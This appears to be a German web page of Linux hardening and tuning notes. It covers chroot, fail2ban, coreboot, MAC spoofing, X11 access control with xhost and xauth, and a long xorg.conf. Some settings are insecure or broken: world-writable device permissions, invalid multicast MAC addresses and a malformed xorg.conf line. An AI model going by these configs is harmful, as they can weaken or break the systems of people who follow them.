das chrootet den User in sein Home-Dir. Lässt sich einfach installieren und konfigurieren und läuft super. https://serversupportforum.de/forum/security/28079-abschottung-wie-geht-es-nun-weiter-2.html Chroot ( Befehl chroot ): ist fester Bestandteil von Befehlen bzw. Kommunikations-Protokollen wie mount, ssh, stfp und stellt die ernsthafte Bedrohung schlechthin dar! Abhilfe liefern Sandboxen und/oder/einschließlich die Sperrung der Shells des Benutzers (der Betrieb einer Sandbox jedoch leider nur, falls seitens eines Programms möglich, beispielsweise nicht mit Tor (dem Tor-Browser) mit angeblich wiederum einer eigenen Sandbox!). Darauf kommen wir noch zu sprechen. Was tut chroot? Chroot einrichten, Chroot-Jail (Chroot-Sandbox) A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally cannot access) files outside the designated directory tree. The term "chroot" may refer to the chroot system call or the chroot wrapper program. The modified environment is called a chroot jail. Nehmen wir an, wir wollten den DNS-Server "named" chrooted installieren. Im folgenden wird das normale Dateisystem als &quto;n/" und das jail als "j/" bezeichnet. https://wiki.debian.org/chroot https://en.wikipedia.org/wiki/Chroot Schritt für Schritt: https://www.linuxwiki.de/chroot chroot - How to jail linux user, Stack Overflow Is there something similar to chroot, but for users? We are about to grant access to our servers for a client and would like them to see only the directories we allow. stackoverflow.com/questions/833247/how-to-jail-linux-user Linux - Keeping users inside their home directory - Super User If you use chroot like this, everything the user needs (executables, libraries, etc.) has to be within the chrooted directory. I´ve seen ftp-servers set up that way, with static executables copied into a bin directory. https://superuser.com/questions/396282/keeping-users-inside-their-home-directory How to configure ProFTPD to chroot users to /home directory or any ... If you´re using ProFTPD user on a Linux server, you most certainly have wondered, how you can configure the FTP server to chroot (or jail) it´s users to a particular ... https://www.pc-freak.net/blog/how-to-configure-proftpd-to-chroot-users-to-home-directory-or-any-other-selected-directory-2 Fail2Ban, http://joshrendek.com/2013/01/securing-ubuntu/ Open up the fail2ban config and change the ban time, destemail, and maxretry /etc/fail2ban/jail.conf: [DEFAULT] ignoreip = 127.0.0.1/8 bantime = 3600 maxretry = 2 destemail = [email protected] action = %(action_mw)s [ssh] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 2 Now restart fail2ban. sudo service fail2ban restart # resp. sh /etc/init.d/fail2ban restart If you try and login from another machine and fail, you should see the ip in iptables. # sudo iptables -L Chain fail2ban-ssh (1 references) target prot opt source destination DROP all -- li203-XX.members.linode.com anywhere RETURN all -- anywhere anywhere Coreboot - Flashen des BIOS: Linux-System als Ersatz für das herkömmliche BIOS, https://www.kuketz-blog.de/sicheres-desktop-system-linux-haerten-teil1/ "Die Sicherheit eines Systems definiert sich bereits auf Hardware-Ebene. Allerdings ist es heute bspw. extrem schwierig WLAN-Chipsätze zu finden, für die Open-Source Treiber bereit stehen. Ausnahmen wie den AR9170 Chipsatz gibt es zwar, aber diese müssen zunächst ausfindig gemacht werden. Gleiches gilt für das BIOS. Idealerweise könnt ihr euer aktuelles BIOS durch Coreboot ersetzen - ein quell-offene, freies BIOS. Ansonsten besteht immer das Risiko für eine versteckte Backdoor, die bspw. von Geheimdiensten ausgenutzt werden kann. Wirklich "sicher" können wir also in der Tat erst dann sein, wenn wir durchgehend Open-Source Hard- und Software einsetzen. [...] Daher bin ich gezwungen für das Projekt "Linux härten" eine Ausnahme zu machen und möchte dies aber nochmal formulieren: Das Projekt schützt nicht vor der gezielter Überwachung durch Geheimdienste. I...] Im ersten Beitrag der Artikelserie "Linux härten" hatte ich bereits aufgezeigt, weshalb ein "sicheres" System nur mit einem quelloffenen Betriebssystem auf Basis von Linux bzw. Unix möglich ist." https://www.coreboot.org/Supported_Motherboards # u.a. "Herkömmliche BIOS-Varianten sind nicht selten mit gewissen Softwarefehlern behaftet; diese sind oft nicht zu bereinigen, wenn nicht vom Hersteller ein Update zur Verfügung gestellt wird. Neben diesen unabsichtlichen Einschränkungen gibt es Ansätze, in Zukunft weitere Funktionen in der proprietären Firmware (BIOS bzw. UEFI) zu implementieren, die bewusste Beschränkungen der Funktionalität befürchten lassen. Beispielsweise Digitale Rechteverwaltung, deren Funktionalität in Teilen bewusst nicht offengelegt wird." Quelle: https://www.kuketz-blog.de/sicheres-desktop-system-linux-haerten-teil1/ https://www.kuketz-blog.de/sicheres-desktop-system-linux-haerten-teil2/ https://de.wikipedia.org/wiki/Coreboot https://www.golem.de/0912/72132.html Mit Coreboot lässt sich demnach die System-Bootzeit verkürzen. Bootzeit verk&uum;rzen: Nehme eine Einstellung in Grub in /boot/grub/menu.lst vor. Setze die Wartezeit bis zur automatischen Auswahl auf nur fünf oder drei Sekunden. Initskripte: Benutze systemd oder überarbeite mit dem Terminalbefehl chkconfig die aufgelisteten Runlevel-Init-Scripte (Dienste, Services) aus /etc/init.d/. Nehme so wenig wie möglich mit chkconfig --add in die Liste auf, indem unbenötige mit chkconfig --del aus der Liste ausgetragen werden! Behebe auf diese Art auch beim Booten gemeldete Loops (Abhängigkeiten) unter diesen Skripten! Mandriva und CentOS booten bei wenigen Listeneinträgen bis zur Desktop-Umgebung dann sogar schneller als Debian in erheblich weniger als einer Minute, auf Intel Celeron weit unter 20 Sekunden (!), von der Zeit für Partitionscheck, Passworteingabe und die noch zu bootende Desktopumgebung natürlich abgesehen! Kopiere für den Fall des Bedarfs des Bios-Setups oder Flashen per Funktionstaste die Datei (Typ ROM) zum Flashen des Bios von Hersteller-DVD zusätzlich auf die Boot-Partition /boot! hal bzw. der haldaemon sorgt bei C6 (Centos 6) bzw. "zuvor" mdv (2010-2012) für erheblich verzögertes Booten, ca. um die 20 Sekunden. Der Bootvorgang ohne ihn und LUKS-Passwort-Login dauert bis zum KDE-Login in kdm ca. 15 Sekunden, mit ihm mehr als eine Minute. hal bzw. hald (haldaemon) kann durch erzeugen einer Datei haldaemon in /etc/sysconfig etwa mit dem Inhalt schneller arbeiten: --child-timeout=15 # Begrenzung der Kindprozesse --daemon=no In /etc/dbus-1/system.d/hal.conf verbiete man ein paar dort bislang erlaubte Methoden und Geräte wie ggfls. LightSensor und WakeOnLan und in einem weiteren Unterverzeichnis können ggfls. z.B. die Datein mit *dell-computer* einfach gelöscht werden.. Konfiguration der CD/DVD-Rom-Laufwerke /etc/udev/rules.de/70-local.rules SUBSYSTEM=="block", KERNEL=="sr0", SYMLINK+="cdrom", GROUP="cdrom", MODE:="0777" /etc/fstab /dev/sr0 /media/cdrom auto ro,user,noauto,unhide,users,mode=1777 0 0 Konfiguration der Netzwerkschnittstelle /etc/udev/rules.d/70-persistent-net.rules # This file was automatically generated by the /lib/udev/write_net_rules # program, run by the persistent-net-generator.rules rules file. # # You can modify it, as long as you keep each rule on a single # line, and change only the value of the NAME= key. # Drakx-net rule for eth0 (cb:ad:b3:81:1a:53) SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="cb:ad:b3:81:1a:53",ATTR{type}=="1", KERNEL=="eth*", NAME="eth0" # PCI device 0x10ec:0x8168 (r8169) SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="01:c0:ba:01:1b:13", ATTR{type}=="1", KERNEL=="eth*", NAME="eth1" Unter ATTR... steht im ersten Eintrag die original MAC-Addresse, also immer noch nicht die erst später per macchanger in /etc/rc.local wärhend des Bootens neu zugewiesene, denn. mit dem Aufruf von macchanger sollte vorzugswweise auch die MAC-Adresse geändert werden (per Aufruf in /etc/rc.local jedesmal beim Booten/System-Neustart, hier allerdings erst nach dem Start von udev). Andernfalls (wovon wir abraten) verwende auch in diesem Fall die Orignal-Macadresse, selbstverständlich alles immer möglichst unter NAME eth0 ! Unter PCI-device folgt ein weiterer, zweiter (von udev autogenerierter) Eintrag, hier mit Bezug auf PCI des ITX-220, aber dann doch bitte immer unter Name eth1 ! ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=dhcp ONBOOT=no METRIC=5 MII_NOT_SUPPORTED=yes USERCTL=no DNS1=127.0.0.1 RESOLV_MODS=yes LINK_DETECTION_DELAY=6 IPV6INIT=no IPV6TO4INIT=no ACCOUNTING=yes DHCP_CLIENT=dhclient -4 -cf /etc/dhcp/dhclient.conf eth0 NEEDHOSTNAME=no PEERDNS=no PEERYP=no PEERNTPD=no TYPE=Ethernet IPADDR=0.0.0.0 MACADDR=e1:a0:b0:cd:a1:b8 # original oder einmal mehr "schwarz maskiert", hier über der eigentlichen (originalen) Hardware-Adresse (Ethernetkarte): /etc/rc.local. "macchanger --mac e1:a0:b0:cd:a1:b8 eth0" und setze in Firewalls wie Linfw3 "your IP" auf die aus dieser MAC-Adresse hervorgehende eigene neue, lokale (IP) f&uum;r (oder nach dem) nächsten Verbindungsaufbau zum Freischalten fürs Surfen etc.. Der noch so stabil laufende Rechner kann kurz dabei nach dem Umstellen in Firewall und Konfigurationsdateien vorübergehend schon mal "vom Glauben abfallen": (genauer gesagt abstürzen)...., erholt sich aber mit den Neustarts allmählich wieder. Net-Aliases /etc/networks default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 # In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to. Link-local addresses are most often assigned automatically through a process known as stateless address autoconfiguration or link-local address autoconfiguration. Link-local addresses are not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses. For protocols that have only link-local addresses, such as Ethernet,[dubious - discuss] hardware addresses assigned by manufacturers in networking elements are unique, consisting of a vendor identification and a serial identifier. Link-local addresses for IPv4 are defined in the address block 169.254.0.0/16 in CIDR notation. In IPv6, they are assigned the address block fe80::/10, https://en.wikipedia.org/wiki/Link-local_address. Preload-Beschleunigung Das Tool Preload beschleunigt nicht den Bootvorgang, aber die Programmstarts oder Autostarts (unter "Startprogramme"), die Sie häufig oder regelmäßig nach jeder Anmeldung verwenden. Der einfache Dienst protokolliert die Programmvorlieben und lädt dann die Favoriten vorab in den Arbeitsspeicher. Der eigentliche Programmstart verläuft dadurch deutlich schneller. Preload ist in den Paketquellen verfügbar und etwa in Ubuntu mit rpm -i --force preload bzw. sudo apt install preload schnell nachinstalliert (Start z.B. über /etc/rc.local). Theoretisch können Sie in die Konfiguration des einfachen Tools manuell eingreifen ("/etc/preload.conf"), dies ist jedoch weder erforderlich noch inhaltlich ergiebig. preload bietet i.a. aber keine nennenswerten Vorteile. https://www.pcwelt.de/ratgeber/Schneller_Linux-Start_ueber_Systemd_-_so_geht_s-Dienste_optimieren-8259105.html rkhunter, chkrootkit, tiger, Lynis - Sicherheitscheck Die Dürchführung eines "Audits" mit Lynis ist denkbar einfach: su lynis audit system --quick Nach dem Durchlauf werdet ihr mit einem Gesamtergebnis, dem sogenannten "Hardening index", konfrontiert. Scrollt ihr im Terminal dann etwas weiter nach oben findet ihr vermutlich eine Menge an "Warnings" und "Suggestions", wie sich euer System absichern lässt. https://www.kuketz-blog.de/linux-systemhaertung-basis-linux-haerten-teil2/ Deinstalliere X Windows auf Servern X Windows ist auf Servern nicht erforderlich. Es gibt keinen Grund, X Windows auf einem Mail- und Apache-Webserver laufen zu lassen. Deaktiviere und entferne X Windows, um die Server-Sicherheit und Leistung zu verbessern. Editiere /etc/inittab und setze den Runlevel auf 3. Nun entferne das X-Windows-System: yum groupremove "X Window System" On CentOS 7/RHEL 7 server use the following commands: yum group remove "GNOME Desktop" yum group remove "KDE Plasma Workspaces" yum group remove "Server with GUI" yum group remove "MATE Desktop" https://www.cyberciti.biz/tips/linux-security.html Grafikkarten & Monitore in Linux optimal nutzen, PC-WELT.de, 30.04.2021 [...] Die standardmäßig installierten Open-Source-Grafiktreiber reichen für die meisten Anwender aus, für optimale Leistung empfiehlt sich die Installation eines Treibers vom Hersteller. https://www.pcwelt.de/ratgeber/Grafikkarten-Monitore-in-Linux-optimal-nutzen-11020222.html X11-Server-Zugriffskontrolle von siehe bspws unter https://www.pcwelt.de/ratgeber/Linux-Zugriffsrechte-fuer-Verzeichnisse-1216203.html erläutert im Wesentichen das Konzept der Zugriffskontrolle, weitere Einzelheiten siehe unter "man chmod". Eine weitere Zugriffskontrolle bezieht sich auf den X11-Server im LAN: die X11-Server-Zugriffskontrolle. Der Kern des X-Protokolls mit X oder auch X-Server zur Steuerung der Graphikkarte, umfasst eine einfache, hostbasierte Authentifzierung. Mittels des Programms xhost lässt sich eine Liste erlaubter Hosts setzen. Nach einer ersten Abfrage über xhost gilt aber bereits by default: "access control enabled, only authorized clients can connect". X11 bietet Platz für Addons, sog. Extensions. X11-SECURITY-Extensions dienen zur Differenzierung von vertrauenswürdigen und nicht vertrauenswürdigen ("trusted" und "untrusted") X-Clients. Damit gelingt das Abhalten nicht vertrauenswürdiger Clients, Fensterinhalte anderer Clients zu lesen und die Eingaben und andere Teile an sich zu reißen etc.. Dokumeniert sind die Extensions im Paket xorg-docs. Möglicher Weise verhilft aber bereits MCC in der Sektion Sicherheit (draksec) wie bei mdv2010 bei der Sperre des X-Servers über zugehörige Sicherheitsabfragen mit Werten wie "KEINEN, BENUTZER, LOKAL, STANDARD UND ALLE". X-Server absichern: Host-basierter ACL-Zugriffsschutz und Cookie-basierter Zugriff Die von ISS Audit von BNL auf Nummer 1 gesetzte System-Verwundbarkeit bezieht sich auf "xhost +" oder ein offenes X-Display. "xhost +" ermöglicht jedem die Beobachtung von Tastaturanschlägen , das Entführen von Fenstern und das Einfügen von Befehlen in die Fenster. Als besonders bedrohlich erweist sich der Root-Zugang zur Maschine. Es gibt keinen vernünftigen Grund für die Ausführung von "xhost +". Die meisten Benutzer benutzen ssh für die Verbindungaufnahme zu anderen Maschinen als ihre Desktop und ssh-tunnelbasierten Verkehr auf X11, den Bedarf an "xhost +" nicht aufkommen zu lassen.. Um X11-Forwarding mit SSH zu ermöglichen, setze: ssh -X host.domain oder durch Hinzufügen in $HOME/.ssh/config: Host *.bnl.gov ForwardX11 yes Die Variable DISPLAYsollte nicht gesetzt sein. ssh nimmt ihr Setzen vor wie: echo $DISPLAY localhost:12.0 X11-Forwarding muss durch den SSH-Server erlaubt werden. Überprüfe /etc/ssh/sshd_config auf die Zeile "X11Forwarding yes". Unter Linux/UNIX kann das Kommando"xhost +" an verschiedenen auszuschaltenden Stellen auftauchen. Grundsätzlich lässt es sich mit "xhost -" daktivieren: . . $HOME/.Xclients $HOME/.Xclients.gnome $HOME/.Xclients.kde $HOME/.xinitrc $HOMN/.xsession /etc/X11/xinit/xinitrc /usr/X11R6/bin/startx /usr/X11R6/lib/X11/xdm/Xsession "man xinit" gibt weitere Auskunft über mit dem Start von X11 ausgefürte Startup-Dateien. Um zu überprüfen, ob das Problem "xhost +" gefixt ist, logge man sich in einen anderen UNIX-Rechner ein, deaktiviere den Kanal zur ssh-X11-Verschlüselung, indem die Umgebungsvariable $DISPLAY auf den Serverport 0 des Desktops zurückgesetzt wird. Starte anschließend xclock. Beispiel: ssh youraccount@yourfavoritunixserver.phy.bnl.gov setenv DISPLAY yourdesktop.phy.bnl.gov:0 xclock Erscheint xclock auf dem Screen ist der X11-Zugang immer noch nicht mit der Zugangskontrolle gesperrt. In diesem Fall sollte eine professionelle Kontaktperson weiterhelfen. . Xterminals Um nach dem Setzen von "xhost -") den Zugang auf Tektronix-Xterminals zu versperren, rufe das "Setup"-Menü, (F3 Taste) auf. In der erscheinenden "Konfigurations-Zusammenfassung" wähle "X Environment" und setze dort quot;Enable Access Control / Erlaube Zugriffskontrolle" auf "Yes". Kehre zum Hauptmenü zurück und wähle "Save Settings to NVRAM". Das Teriminal wird nun alle X-Verbindungen zurückweisen, außer die von der via XDM verbundenen Maschine und solchen, die durch Tunnel zum eigenen XDM-Host, die erzeugt werden, wenn SSH auf anderen Maschinen läuft. Nachdem "xhost +" auf dem XDM-Host ausgeführt worden ist, ist die Zugriffskontrolle erneut außer Kraft gesetzt. Man vergewissere sich daher in jeder der bereits aufgelisteten Setup-Dateien. Original-E-Mail von Ofer Rind zur Aktivierung der X11-Authentifizierung auf NCD-Xterminals: ----------- - Disabling Xhost+ on an Xterminal (NB: This was tried on both NCD and Textronix Xterminals and seemed to work; however, your mileage may vary. The description is for an NCD.) Press Alt-F3 to pull up the Xterminal control bar. Select "Change Setup Parameters" from the "Setup" menu. When the setup parameters window pops up, select "Access Control." This will expand the menu, revealing an option called "Enable Access Control." Turn this on by pressing the adjacent square. Then, at the bottom of setup window, press the "Apply" button to effect the change. This sometimes takes several seconds, be patient. When the arrow cursor returns, close the setup window and return to your previously scheduled program. X access control should now (hopefully) be enabled. NOTE that this access control can be superseded by a user who logs in on the Xterm and sets "xhost +". Quelle: http://www.phy.bnl.gov/cybersecurity/old/xhost_plus.html Unsere Eingabe zu diesem Thema X11-Zugriffskontrolle per Terminal und in /etc/rc.local: xhost +si:localuser:´id -un´ >& /dev/null bzw. xhost - xhost +si:localuser:lokaler-Benutzername# lokaler-Benutzername: nur user, d.h. alle anderen Benutzer sind gesperrt, darunter Benutzer root,surfuser und toruser xhost -si:localuser:root # bereits mit "xhost -" xhost -si:localuser:toruser # bereits mit "xhost -" xhost -si:localuser:surfuser # bereits mit "xhost -" xhost -inet6:user@ # Das @-Zeichen muss bei inet6 (IPv6) im Unterschied zu si hinter dem Benutzernamen user stehen. xhost -nis:user@ # nis: Secure RPC network Diese xhost-Kommdos sollte man nicht unbedingt in /etc/rc.local hinzufügen sondern "man xhost" nach in einer separt zu erzeugenden Datei /etc/X0.hosts ablegen: "The initial access control list for display number n may be set by the file /etc/Xn.hosts, where n is the display number of the server. See Xserver(1) for details." Ausgabe von xhost (bei Problemen nach dem Anmelden wieder kurz mit "xhost +" zurücksetzen): access control enabled, only authorized clients can connect SI:localuser:lokaler-Benutzername Diese Regel nicht für andere Nutzer setzen, auch NICHT root! Damit wird das System einmal mehr mausklick-schnell und sicher. X-Server: Cookie-basierter Zugriff: MIT-MAGIC-COOKIE-1 When using xdm (X Display Manager) to log in, you get a much better access method: MIT-MAGIC-COOKIE-1. Above deals with the host-based accesss. A 128-bit "cookie" is generated and stored in your .Xauthority file. If you need to allow a remote machine access to your display, you can use the xauth command and the information in your .Xauthority file to provide access to only that connection. See the Remote-X-Apps mini-howto, available at http://metalab.unc.edu/LDP/HOWTO/mini/Remote-X-Apps.html. Also use ssh (see Section 6.4, above) to allow secure X connections. This has the advantage of also being transparent to the end user and means, that no unencrypted data flows across the network. Cookie-based access The cookie-based authorization methods are based on choosing a magic cookie (an arbitrary piece of data) and passing it to the X display server when it is started; every client that can prove having knowledge of this cookie is then authorized connection to the server. These cookies are created by a separate program and stored in the file .Xauthority in the user´s home directory, by default. As a result, every program run by the client on the local computer can access this file and therefore the cookie that is necessary for being authorized by the server. If the user wants to run a program from another computer on the network, the cookie has to be copied to that other computer. How the cookie is copied is a system-dependent issue: for example, on Unix-like platforms, scp can be used to copy the cookie. The two systems using this method are MIT-MAGIC-COOKIE-1 and XDM-AUTHORIZATION-1. In the first method, the client simply sends the cookie when requested to authenticate. In the second method, a user key is also stored in the .Xauthority file. The client creates a string by concatenating the current time, a transport-dependent identifier, and the cookie, encrypts the resulting string, and sends it to the server. The xauth application is a utility for accessing the .Xauthority file. The environment variable XAUTHORITY can be defined to override the name and location of that cookie file. The Inter-Client Exchange (ICE) Protocol implemented by the Inter-Client Exchange Library for direct communication between X11 clients uses the same MIT-MAGIC-COOKIE-1 authentication method, but has its own iceauth utility for accessing its own .ICEauthority file, the location of which can be overridden with the environment variable ICEAUTHORITY. ICE is used, for example, by DCOP and the X Session Management protocol (XSMP). https://en.wikipedia.org/wiki/X_Window_authorization Fetch the magic cookie entry relevant to your local display: [garth@server1 ~]$ echo xauth add xauth list ${DISPLAY#localhost} xauth add server1.localdomain/unix:12 MIT-MAGIC-COOKIE-1 2928a6e16b7d6d57041dcee632764b72 Switch user to "oracle" and add the entry into your /home/oracle/.Xauthority file (by copying the ‘xauth add…´ line from above: [garth@server1 ~]$ sudo su - oracle [oracle@server1 garth]$ echo $DISPLAY localhost:12.0 [oracle@server1 garth]$ xauth add server1.localdomain/unix:12 MIT-MAGIC-COOKIE-1 2928a6e16b7d6d57041dcee632764b72 xauth: creating new authority file /home/oracle/.Xauthority After this your X-session should work…try something like "xcalc" or "firefox" to test it first and you should be ready to go! http://www.snapdba.com/2013/02/ssh-x-11-forwarding-and-magic-cookies/ Also disable any remote connections to your X server by using the ´-nolisten tcp´ options to your X server. This will prevent any network connections to your server over tcp sockets. Take a look at the Xsecurity man page for more information on X security. The safe bet is to use xdm to login to your console and then use ssh to go to remote sites on which you wish to run X programs. http://www.tldp.org/HOWTO/Security-HOWTO/password-security.html#AEN698 X11: Einstellungen für Graphikkarte optimieren, insbes. für Spiele Die optimale Einstellung kommt System und Graphikkarte entgegen. BIOS-Setup: Northbridge -> COMBO-Mode Aufruf driconf (Hardware siehe unter Datenblatt) Aktivieren: 1) Leistung + Synchronisation mit der vertikalen Bildwiederholung: Immer mit der Bildwiederholung synchronisieren, Anwendung wählt das minimale Bildintervall + Buffer object reuse: Enable reuse of all size of buffer objects 2 ) Bildqualität + Aktiviere S3TC Texturkomprimierung, auch wenn die nötige Softwareunterstützung fehlt 3) Fehlersuche + Aktiviere sofortige Leerung des Stapelpuffers nach jedem Zeichenaufruf + Aktiviere sofortige Leerung der GPU-Zwischenspeicher + Disable throttling on first batch after flush + Force GLSL extension default behavior to "warn" + Disable backslash-based line continuation in GLSL-source + Disable dual source blending + Perform code generation at shader link time /etc/X11/xorg.conf, mausklick-schnell für IGP INTEL-GMA-945 und die optische Logitech- und Trackball-Maus am PS2-Port, Keyboard am USB-Anschluss: Hier, in dieser Konfigurationsdatei, kann man alle Bildschirm-Auflösungen bis auf die aktuell (und dauerhaft) gewählte austragen und die Frequenzbereiche sehr eng fassen. Einige graphische Spiele stimmen sich dann von selbst auf die übrig gebliebene Einstellung ab und das Bild samt Schriftbild ist und bleibt immer scharf, allerdings entfällt bei einigen Spielen nun der Fullscreen. /etc/X11/xorg.conf ###################################### # xorg.conf mit automatischer Hardware-Erkennung # WARNUNG: VERSUCHE, DICH ANFANGS AUF NUR EINIGE WENIGE EINSTELLUNGEN ZU KONZENTRIEREN, WENN DER X-SERVER NICHT STARTET und vor dem Start immer noch nach einer Konfiguration fragt: # Imfalle eines Fehlstarts konsultiere /var/log/Xog.0.log und suche dort nach Error- (EE)- und Warnungen- (WW)-Einträgen! ##################################### # # Einzelheiten: "man xorg.conf" # File generated by XFdrake (rev ) # ************************************************* # Refer to the xorg.conf man page for details about the format of # this file. # ****** # ************************************************ Section "ServerLayout" Identifier "XFree86 Configured" Screen 0 "Screen0" 0 0 # InputDevice "Keyboard0" "CoreKeyboard" # commented in: hotplug # InputDevice "Mymouse1" "CorePointer"# commented in: hotplug Option "AIGLX" "true" EndSection Section "ServerFlags" Option "DontVTSwitch" "true" Option "DontZap" "true" # disable <Ctrl><Alt><BS> (server abort) Option "AllowMouseOpenFail" "true" # allows the server to start up even if the mouse does not work DontZoom # disable <Ctrl><Alt><KP_+>/<KP_-> (resolution switching) Option "DPMS" "true" Option "Xinerama" "true" Option "DRI2" "true" # Option "DRI3" "true" Option "UseDefaultFontPath" "true" Option "Pixmap" "32" Option "IgnoreABI" "true" # X-Server-Version Option "AutoAddDevices" "true" Option "AutoEnableDevices" "true" EndSection Section "Module" Load "dbe" # Double-Buffering Extension Load "v4l" # Video for Linux Load "type1" Load "freetype" Load "glx" # 3D layer Load "dri2" # direct rendering # Load "dri3" # direct rendering Load "glamoregl" # glamor Load "record" # Developer extension, usually not needed ( ... but this is speeding up KI !) Load "extmod" # Load "speedo" # Speedo fonts, this module doesn´t exist in Xorg 7.0.17 # The following are deprecated/unstable/unneeded in Xorg 7.0 # Load "ddc" # ddc probing of monitor, this should be never present, as it gets automatically loaded. # Load "GLcore" # This should be never present, as it gets automatically loaded. # Load "bitmap" # Should be never present, as it gets automatically loaded. This is a font module, and loading it in xorg.conf makes X try to load it twice. SubSection "extmod" Option "omit xfree86-dga" EndSubSection EndSection Section "Extensions" # compiz needs Composite, but it can cause bad (end even softreset-resistant) # effects in some graphics cards, especially nv. Option "Composite" "Enable" EndSection Section "Monitor" Identifier "Monitor0" ModelName "Generic Monitor" # HorizSync 47.7 # VertRefresh 59.8 Option "PreferredMode" "1366x768" # DisplaySize 361 203 # Beware having to wear glasses! Vesa values! You can comment in following Modeline for Monitor AOC e943FwS preferred modeline (59.8 Hz vsync, 47.7 kHz hsync, ratio 16/9, 84 dpi) # ModeLine "1366×768" 85.5 1366 1436 1579 1792 768 771 774 798 +hsync +vsync # ModeLine "1368×768_120" 185.67 1368 1472 1624 1880 768 769 772 823 -hSync +vsync # ModeLine "1368×768_100" 151.73 1368 1464 1616 1864 768 769 772 814 -hSync +vsync # ModeLine "1368×768_85" 125.67 1368 1456 1600 1832 768 769 772 807 -hSync +vsync # ModeLine "1368×768_75" 110.19 1368 1456 1600 1832 768 769 772 802 -hSync +vsync # ModeLine "1368×768_60" 85.86 1368 1440 1584 1800 768 769 772 795 -hSync +vsync # ModeLine "1368×768" 85.86 1368 1440 1584 1800 768 769 772 795 -hSync +vsync # ModeLine "1368×768_50" 69.92 1368 1424 1568 1768 768 769 772 791 -hSync +vsync # Option "MonitorLayout" "LVDS,AUTO" EndSection Section "Device" Identifier "Card0" # Driver (chipset) autodetect VendorName "All" BoardName "All" # BusID "PCI:1:0:0" # VendorName "Intel Corporation" # BoardName "Intel 810 and later" # Driver "intel" # alternativ: fbdev (framebuffer device), vesa (Standard), vga, vga16, uncommon, void, dummy, ati, catalyst, nv, nvidia, nouveau, amdgpu, rendition, radeon, radeonhd, fglrx, tdfx, trident, virge, s3virge, siliconmotion, aiptek, apm, ast, fpit, glint, mutouch, qxl, r128, synaptics, v4l, wacom, xgi, ark, virtualbox, vmware, vmmouse, matrox, cirrus, aty, i810, i128, i740, ark, kyropfb, matrox, i2c-matrox, hga, riva, sst, neo, s3, openchrome (incl. unichrome), savage, sis, tseng, ... Screen 0 # BusID "PCI:0:2:0" Option "DPMS" Option "AccelMethod" "uxa" # Option "AccelMethod" "sna" # Option "AccelMethod" "EXA" # Option "AccelMethod" "glamor" Option "AddARGBGLXVisuals" "true" Option "fbdev" "true" # this speeds up too Option "DRI" "true" Option "DRI" "2" # Option "DRI" "3" ### More available Driver options, X11 for Intel 945G configures the options for you automatically, so you might comment in most of them # sw_cursor is needed for some ati and radeon cards # Option "sw_cursor" # Option "hw_cursor" # Option "NoAccel" # Option "ShowCache" Option "ShadowFB" Option "UseFBDev" # Option "Rotate" # Option "VideoKey" # Option "Linear Framebuffer <bool> # Option "SwapbuffersWait" <bool> # Option "XvPreferOverlay" "true" # Option "Backlight" <string> # Option "ColorKey" <i> Option "HotPlug" "true" # mouse and keyboard in section device don´nt need to be declared in future (although we do) Option "XvMC" "true" # Option "BufferCache" "true" # Option "DisableGLXRootClipping" "true" # Option "EnablePageFlip" "true" # Option "ColorTiling2D" "true" # Option "TripleBuffer" "true" # Option "MigrationHeuristic" "greedy" # Option "ColorTiling" "true" Option "TearFree" "true" Option "ZaphodHeads" "VGA1" # Tweaks for the xorg 7.4 (otherwise broken) "intel" driver # Option "Tiling" "true" Option "Legacy3D" "true"# compiz, beryl 3D-Support with DRI &Composite Option "XAANoOffscreenPixmaps" Option "AllowGLXWithComposite" "true" # These two lines are (presumably) needed to prevent fonts from being scrambled Option "XaaNoScanlineImageWriteRect" "true" Option "XaaNoScanlineCPUToScreenColorExpandFill" "true" # Option "RelaxedFencing" <bool> # Option "RelaxedFencing" # [<bool>] # Option "Throttle" # [<bool>] # Option "DelayedFlush" # [<bool>] # Option "PerCrtcPixmaps" # [<bool>] # Option "FallbackDebug" # [<bool>] # Option "DebugFlushBatches" # [<bool>] # Option "DebugFlushCaches" # [<bool>] # Option "DebugWait" # [<bool>] EndSection Section "Screen" Identifier "Screen0" Device "Card0" Monitor "Monitor0" DefaultColorDepth 24 Option "AddARGBGLXVisuals" "true" # Option "DisableGLXRootClipping" "true" SubSection "Display" Depth 32 Modes "1366×768 1360×765 1280×720 1024×768 860×640" # up to 4096 possible for Intel 945G of ITX-220 EndSubSection SubSection "Display" Depth 24 Modes "1366×768 1360×765 1280×720 1024×768" EndSubSection SubSection "Display" Depth 16 Modes "1366×768 1360×765 1280×720 1024×768" 860×640" EndSubSection SubSection "Display" Depth 15 Modes "1366×768 1360×765 1280×720 1024×768" EndSubSection SubSection "Display" Depth 8 Modes "1366×768 1360×765 1280×720 1024×768" EndSubSection EndSection Section "DRI" Mode 0666 EndSection Section "InputDevice" # not needed, if hotplugged Identifier "Mymouse1" Driver "mouse" # man mousedrv # Option "Device" "/dev/ttyS0" # Option "Protocol" "ImPS/2" Option "Protocol" "usb" # Option "Protocol" "auto" # Option "Protocol" "Auto" # Option "Protocol" "ExplorerPS/2" # Option "Protocol" "auto" # Option "Device" "/dev/psaux" # Option "Device" "/dev/ttyS0" Option "Device" "/dev/input/mice" Option "Emulate3Buttons" "true" Option "CorePointer" # Option "ZAxisMapping" "4 5" # wheel mouse, not needed, if hotplugged # Option "ZAxisMapping" "4 5 6 7" EndSection Section "InputDevice" # generated from default Identifier "Keyboard0" Driver "kbd" Option "XkbModel" "pc105" Option "XkbLayout" "de" Option "CoreKeyboard" Option "XkbRules" "xorg" Option "AccelerationProfile" "0" EndSection Used driver: xorg-x11-drv-intel (el6, 2010-2020, not from CentOS 6 in year2016, but 2020 from https://download.copr.fedorainfracloud.org/results/scx/xorg-x11-drv-intel/epel-6-x86_64/01523747-xorg-x11-drv-intel/) for Intel 945MG from mainboard ITX-220 Einzelheiten siehe unter man "xorg.conf" und "man mousedrv" X11-Fehlerprotokoll: /var/log/Xorg.0.log Versuchen Sie X11 ruhig auch mal ganz ohne /etc/xorg.conf ! 